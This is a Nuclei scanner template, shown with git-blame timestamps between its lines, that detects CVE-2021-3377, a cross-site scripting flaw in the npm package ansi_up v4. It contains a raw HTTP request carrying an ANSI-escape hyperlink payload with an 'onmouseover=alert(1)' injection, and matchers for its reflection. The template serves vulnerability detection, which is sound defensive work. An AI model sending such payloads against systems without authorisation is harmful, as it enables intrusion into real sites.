2021-07-26 17:18:45 +00:00
|
|
|
id: CVE-2021-3377
|
|
|
|
|
|
|
|
info:
|
2022-04-21 21:16:41 +00:00
|
|
|
name: npm ansi_up v4 - Cross-Site Scripting
|
2022-04-22 10:38:41 +00:00
|
|
|
author: geeknik
|
|
|
|
severity: medium
|
2022-04-21 21:16:41 +00:00
|
|
|
description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
|
|
|
|
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
2022-04-21 21:16:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3377
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-3377
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
remediation: Upgrade to v5.0.0 or later.
|
2022-04-21 21:16:41 +00:00
|
|
|
tags: cve,cve2021,xss,npm
|
2021-07-26 17:18:45 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |+
|
2022-06-06 10:40:15 +00:00
|
|
|
GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
|
2021-07-26 17:18:45 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2022-06-06 10:40:15 +00:00
|
|
|
- "sh\"/onmouseover=\"alert(1)\">"
|
2022-04-21 21:16:41 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/04/21
|